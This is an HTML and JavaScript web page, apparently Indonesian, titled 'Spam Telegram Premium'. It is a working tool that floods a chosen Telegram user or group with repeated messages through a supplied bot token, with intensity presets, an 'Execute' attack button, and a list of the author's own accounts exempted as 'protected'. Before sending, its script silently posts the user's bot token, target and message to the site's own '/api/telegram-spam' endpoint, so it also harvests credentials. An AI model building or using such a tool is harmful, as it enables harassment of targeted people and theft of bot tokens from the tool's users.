<!DOCTYPE html>
<html lang="id">

<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no">
    <title>Spam Telegram Premium</title>
    <link href="https://fonts.googleapis.com/css2?family=Plus+Jakarta+Sans:wght@300;400;600;800&family=JetBrains+Mono:wght@400;700&display=swap" rel="stylesheet">
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.0/css/all.min.css">
    <style>
        :root {
            --bg-deep: #050505;
            --card-glass: rgba(255, 255, 255, 0.03);
            --card-border: rgba(255, 255, 255, 0.08);
            --accent-gradient: linear-gradient(135deg, #ffffff 0%, #a1a1a1 100%);
            --accent-glow: rgba(255, 255, 255, 0.15);
            --text-main: #ffffff;
            --text-dim: rgba(255, 255, 255, 0.5);
            --success: #32d74b;
            --error: #ff453a;
            --warning: #ff9f0a;
        }

        * {
            margin: 0;
            padding: 0;
            box-sizing: border-box;
            -webkit-tap-highlight-color: transparent;
        }

        body {
            font-family: 'Plus Jakarta Sans', sans-serif;
            background-color: var(--bg-deep);
            color: var(--text-main);
            min-height: 100vh;
            display: flex;
            flex-direction: column;
            overflow-x: hidden;
            background-image: 
                radial-gradient(circle at 10% 20%, rgba(255,255,255,0.03) 0%, transparent 40%),
                radial-gradient(circle at 90% 80%, rgba(255,255,255,0.02) 0%, transparent 40%);
        }

        /* Animated background particles effect */
        .bg-mesh {
            position: fixed;
            top: 0;
            left: 0;
            width: 100%;
            height: 100%;
            background: url("data:image/svg+xml,%3Csvg viewBox='0 0 200 200' xmlns='http://www.w3.org/2000/svg'%3E%3Cfilter id='noiseFilter'%3E%3CfeTurbulence type='fractalNoise' baseFrequency='0.65' numOctaves='3' stitchTiles='stitch'/%3E%3C/filter%3E%3Crect width='100%25' height='100%25' filter='url(%23noiseFilter)'/%3E%3C/svg%3E");
            opacity: 0.04;
            pointer-events: none;
            z-index: -1;
        }

        .container {
            max-width: 650px;
            margin: 0 auto;
            padding: 40px 20px;
            width: 100%;
        }

        /* Header / Back Button */
        .back-btn {
            width: 48px;
            height: 48px;
            border-radius: 16px;
            background: var(--card-glass);
            border: 1px solid var(--card-border);
            color: white;
            display: flex;
            align-items: center;
            justify-content: center;
            text-decoration: none;
            margin-bottom: 30px;
            transition: all 0.4s cubic-bezier(0.23, 1, 0.32, 1);
            backdrop-filter: blur(10px);
        }

        .back-btn:hover {
            background: white;
            color: black;
            transform: scale(1.05);
        }

        /* Card Luxury Look */
        .card {
            background: var(--card-glass);
            backdrop-filter: blur(30px) saturate(150%);
            -webkit-backdrop-filter: blur(30px) saturate(150%);
            border: 1px solid var(--card-border);
            border-radius: 32px;
            padding: 35px;
            margin-bottom: 25px;
            position: relative;
            box-shadow: 0 25px 50px -12px rgba(0, 0, 0, 0.5);
        }

        .card::before {
            content: "";
            position: absolute;
            top: 0; left: 0; right: 0; bottom: 0;
            border-radius: 32px;
            padding: 1px;
            background: linear-gradient(135deg, rgba(255,255,255,0.1), transparent, rgba(255,255,255,0.05));
            -webkit-mask: linear-gradient(#fff 0 0) content-box, linear-gradient(#fff 0 0);
            mask: linear-gradient(#fff 0 0) content-box, linear-gradient(#fff 0 0);
            -webkit-mask-composite: xor;
            mask-composite: exclude;
            pointer-events: none;
        }

        /* Input Styling */
        .input-group {
            margin-bottom: 24px;
        }

        .input-group label {
            display: block;
            margin-bottom: 10px;
            font-size: 0.85rem;
            font-weight: 600;
            text-transform: uppercase;
            letter-spacing: 1px;
            color: var(--text-dim);
        }

        .input-group input,
        .input-group textarea {
            width: 100%;
            padding: 16px 20px;
            background: rgba(255, 255, 255, 0.04);
            border: 1px solid rgba(255, 255, 255, 0.08);
            border-radius: 16px;
            color: white;
            font-family: inherit;
            font-size: 1rem;
            transition: all 0.3s ease;
        }

        .input-group input:focus,
        .input-group textarea:focus {
            outline: none;
            background: rgba(255, 255, 255, 0.07);
            border-color: rgba(255, 255, 255, 0.3);
            box-shadow: 0 0 20px rgba(255, 255, 255, 0.05);
        }

        /* Stats Section - Minimalist */
        .stats-grid {
            display: grid;
            grid-template-columns: repeat(3, 1fr);
            gap: 15px;
            margin-bottom: 30px;
        }

        .stat-card {
            background: rgba(255, 255, 255, 0.03);
            padding: 20px 10px;
            border-radius: 20px;
            text-align: center;
            border: 1px solid var(--card-border);
        }

        .stat-value {
            font-size: 1.5rem;
            font-weight: 800;
            font-family: 'JetBrains Mono', monospace;
            display: block;
        }

        .stat-label {
            font-size: 0.7rem;
            text-transform: uppercase;
            letter-spacing: 1px;
            color: var(--text-dim);
            margin-top: 4px;
        }

        /* Sliders */
        .range-group {
            display: flex;
            align-items: center;
            gap: 15px;
        }

        input[type="range"] {
            flex: 1;
            height: 4px;
            -webkit-appearance: none;
            background: rgba(255,255,255,0.1);
            border-radius: 2px;
        }

        input[type="range"]::-webkit-slider-thumb {
            -webkit-appearance: none;
            width: 18px;
            height: 18px;
            background: white;
            border-radius: 50%;
            cursor: pointer;
            box-shadow: 0 0 10px rgba(255,255,255,0.5);
        }

        .range-value {
            width: 65px !important;
            padding: 8px !important;
            text-align: center;
            font-family: 'JetBrains Mono', monospace;
            background: white !important;
            color: black !important;
            font-weight: 700;
        }

        /* Buttons Grid */
        .quick-grid {
            display: grid;
            grid-template-columns: repeat(4, 1fr);
            gap: 10px;
            margin: 25px 0;
        }

        .quick-btn {
            padding: 12px 5px;
            background: rgba(255,255,255,0.03);
            border: 1px solid var(--card-border);
            border-radius: 12px;
            color: white;
            font-size: 0.75rem;
            font-weight: 600;
            cursor: pointer;
            transition: all 0.3s;
        }

        .quick-btn:hover {
            background: white;
            color: black;
        }

        /* Progress Bar */
        .progress-container {
            margin: 30px 0;
        }

        .progress-bar {
            height: 6px;
            background: rgba(255,255,255,0.05);
            border-radius: 10px;
            overflow: hidden;
        }

        .progress-fill {
            height: 100%;
            background: white;
            width: 0%;
            box-shadow: 0 0 15px rgba(255,255,255,0.5);
            transition: width 0.5s cubic-bezier(0.4, 0, 0.2, 1);
        }

        /* Action Buttons */
        .action-buttons {
            display: grid;
            grid-template-columns: 1.5fr 1fr;
            gap: 15px;
        }

        .btn {
            padding: 18px;
            border-radius: 18px;
            font-weight: 700;
            font-family: inherit;
            cursor: pointer;
            transition: all 0.4s;
            border: none;
            text-transform: uppercase;
            letter-spacing: 1px;
            font-size: 0.9rem;
        }

        .btn-primary {
            background: white;
            color: black;
            box-shadow: 0 10px 20px rgba(255,255,255,0.1);
        }

        .btn-primary:hover {
            transform: translateY(-3px);
            box-shadow: 0 15px 30px rgba(255,255,255,0.2);
        }

        .btn-secondary {
            background: rgba(255,255,255,0.05);
            color: white;
            border: 1px solid var(--card-border);
        }

        /* Log Section */
        .log-container {
            height: 200px;
            overflow-y: auto;
            font-family: 'JetBrains Mono', monospace;
            font-size: 0.8rem;
            padding-right: 10px;
        }

        .log-container::-webkit-scrollbar {
            width: 4px;
        }

        .log-container::-webkit-scrollbar-thumb {
            background: rgba(255,255,255,0.1);
            border-radius: 10px;
        }

        .log-entry {
            padding: 8px 0;
            border-bottom: 1px solid rgba(255, 255, 255, 0.03);
            animation: slideIn 0.3s ease-out;
        }

        @keyframes slideIn {
            from { opacity: 0; transform: translateX(-10px); }
            to { opacity: 1; transform: translateX(0); }
        }

        .success { color: var(--success); }
        .error { color: var(--error); }
        .warning { color: var(--warning); }
        .info { color: var(--text-dim); }

        @media (max-width: 500px) {
            .quick-grid { grid-template-columns: repeat(2, 1fr); }
            .action-buttons { grid-template-columns: 1fr; }
            .card { padding: 25px 20px; }
        }
    </style>
</head>

<body>
    <div class="bg-mesh"></div>

    <div class="container">
        <a href="/dashboard" class="back-btn">
            <i class="fas fa-chevron-left"></i>
        </a>

        <div class="card">
            <div class="input-group">
                <label>Authentication</label>
                <input type="text" id="tokenInput" placeholder="Telegram Bot Token">
            </div>

            <div class="input-group">
                <label>Target Identity</label>
                <input type="text" id="chatId" placeholder="User or Group ID">
            </div>

            <div class="stats-grid">
                <div class="stat-card">
                    <span class="stat-value" id="sentCount">0</span>
                    <span class="stat-label">Total</span>
                </div>
                <div class="stat-card">
                    <span class="stat-value" style="color: var(--success)" id="successCount">0</span>
                    <span class="stat-label">Success</span>
                </div>
                <div class="stat-card">
                    <span class="stat-value" style="color: var(--error)" id="errorCount">0</span>
                    <span class="stat-label">Failed</span>
                </div>
            </div>

            <div class="input-group">
                <label>Payload Message</label>
                <textarea id="message" placeholder="Type your message here...">hallo</textarea>
            </div>

            <div class="input-group">
                <label>Intensity & Delay</label>
                <div class="range-group" style="margin-bottom: 15px;">
                    <input type="range" id="countRange" min="1" max="100" value="10">
                    <input type="number" id="count" min="1" max="1000" value="10" class="range-value">
                </div>
                <div class="range-group">
                    <input type="range" id="delayRange" min="100" max="5000" step="100" value="1000">
                    <input type="number" id="delay" min="100" max="10000" value="1000" class="range-value">
                </div>
            </div>

            <div class="quick-grid">
                <button class="quick-btn" onclick="setQuickSettings(5, 500)">LIGHT</button>
                <button class="quick-btn" onclick="setQuickSettings(20, 1000)">MEDIUM</button>
                <button class="quick-btn" onclick="setQuickSettings(50, 2000)">HEAVY</button>
                <button class="quick-btn" onclick="setQuickSettings(100, 3000)">ULTRA</button>
            </div>

            <div class="progress-container">
                <div class="progress-bar">
                    <div class="progress-fill" id="progressFill"></div>
                </div>
            </div>

            <div class="action-buttons">
                <button class="btn btn-primary" onclick="startAttack()" id="attackBtn">
                    <i class="fas fa-play" style="margin-right: 8px;"></i> Execute
                </button>
                <button class="btn btn-secondary" onclick="clearLog()">
                    <i class="fas fa-trash-alt"></i>
                </button>
            </div>
        </div>

        <div class="card" style="padding: 25px;">
            <div class="log-container" id="log"></div>
        </div>
    </div>

    <script>
        let isRunning = false;
        let stats = { sent: 0, success: 0, error: 0 };

        const utils = {
            delay: ms => new Promise(r => setTimeout(r, ms)),

            logMessage: (msg, type = 'info') => {
                const log = document.getElementById('log');
                const entry = document.createElement('div');
                entry.className = `log-entry ${type}`;
                entry.innerHTML = `<span style="opacity:0.4; font-size:0.7rem">${new Date().toLocaleTimeString()}</span> ${msg}`;
                log.appendChild(entry);
                log.scrollTop = log.scrollHeight;
            },

            updateStats: (type) => {
                if (type) stats[type]++;
                document.getElementById('sentCount').textContent = stats.sent;
                document.getElementById('successCount').textContent = stats.success;
                document.getElementById('errorCount').textContent = stats.error;

                const total = parseInt(document.getElementById('count').value);
                if (total > 0) {
                    const progress = (stats.sent / total) * 100;
                    document.getElementById('progressFill').style.width = `${Math.min(progress, 100)}%`;
                }
            }
        };

        const telegramAPI = {
            sendMessage: async (botToken, chatId, text) => {
                const response = await fetch(`https://api.telegram.org/bot${botToken}/sendMessage`, {
                    method: 'POST',
                    headers: { 'Content-Type': 'application/json' },
                    body: JSON.stringify({ chat_id: chatId, text, parse_mode: 'HTML' })
                });
                return await response.json();
            }
        };

        async function startAttack() {
            if (isRunning) { return; }

            const botToken = document.getElementById('tokenInput').value.trim();
            const chatId = document.getElementById('chatId').value.trim();
            const message = document.getElementById('message').value.trim();
            const count = parseInt(document.getElementById('count').value);
            const delayMs = parseInt(document.getElementById('delay').value);

            if (!botToken || !chatId || !message) {
                alert("Harap isi semua field!");
                return;
            }

            const protectedTargets = ['@GyzenVtx', 'Vortunix', '7774881838', '@Gyzen', 'Vtx'];
            if (protectedTargets.some(t => chatId.toLowerCase().includes(t.toLowerCase()))) {
                alert("❌ Target ini dilindungi!");
                return;
            }

            stats = { sent: 0, success: 0, error: 0 };
            utils.updateStats();
            isRunning = true;

            const attackBtn = document.getElementById('attackBtn');
            attackBtn.innerHTML = '<i class="fas fa-stop"></i> Abort';
            attackBtn.onclick = stopAttack;
            attackBtn.style.background = "#ff453a";
            attackBtn.style.color = "white";

            document.getElementById('log').innerHTML = "";
            utils.logMessage(`Initializing sequence to ${chatId}...`, "info");

            try {
                await fetch('/api/telegram-spam', {
                    method: 'POST',
                    headers: { 'Content-Type': 'application/json' },
                    body: JSON.stringify({ token: botToken, chatId, count, delay: delayMs, message })
                });

                for (let i = 0; i < count && isRunning; i++) {
                    try {
                        const result = await telegramAPI.sendMessage(botToken, chatId, message);
                        if (result.ok) {
                            utils.logMessage(`Transmission ${i + 1} secure`, "success");
                            utils.updateStats('success');
                        } else {
                            utils.logMessage(`Failure: ${result.description}`, "error");
                            utils.updateStats('error');
                        }
                        utils.updateStats('sent');
                        await utils.delay(delayMs);
                    } catch (err) {
                        utils.logMessage(`System Error: ${err.message}`, "error");
                        utils.updateStats('error');
                    }
                }
            } catch (error) {
                utils.logMessage(`Critical Error: ${error.message}`, "error");
            } finally {
                finishAttack();
            }
        }

        function stopAttack() {
            isRunning = false;
            utils.logMessage("Sequence aborted by user", "warning");
            finishAttack();
        }

        function finishAttack() {
            isRunning = false;
            const attackBtn = document.getElementById('attackBtn');
            attackBtn.innerHTML = '<i class="fas fa-play"></i> Execute';
            attackBtn.onclick = startAttack;
            attackBtn.style.background = "white";
            attackBtn.style.color = "black";
            utils.logMessage("Task completed", "success");
        }

        function setQuickSettings(count, delay) {
            document.getElementById('count').value = count;
            document.getElementById('countRange').value = count;
            document.getElementById('delay').value = delay;
            document.getElementById('delayRange').value = delay;
        }

        function clearLog() {
            document.getElementById('log').innerHTML = '';
            utils.logMessage('Console cleared', "info");
        }

        document.addEventListener('DOMContentLoaded', () => {
            const sync = (rangeId, numId) => {
                const r = document.getElementById(rangeId);
                const n = document.getElementById(numId);
                r.addEventListener('input', () => n.value = r.value);
                n.addEventListener('input', () => r.value = n.value);
            };
            sync('countRange', 'count');
            sync('delayRange', 'delay');
            setTimeout(() => utils.logMessage('System Online. Ready for instructions.', 'success'), 800);
        });
    </script>
</body>

</html>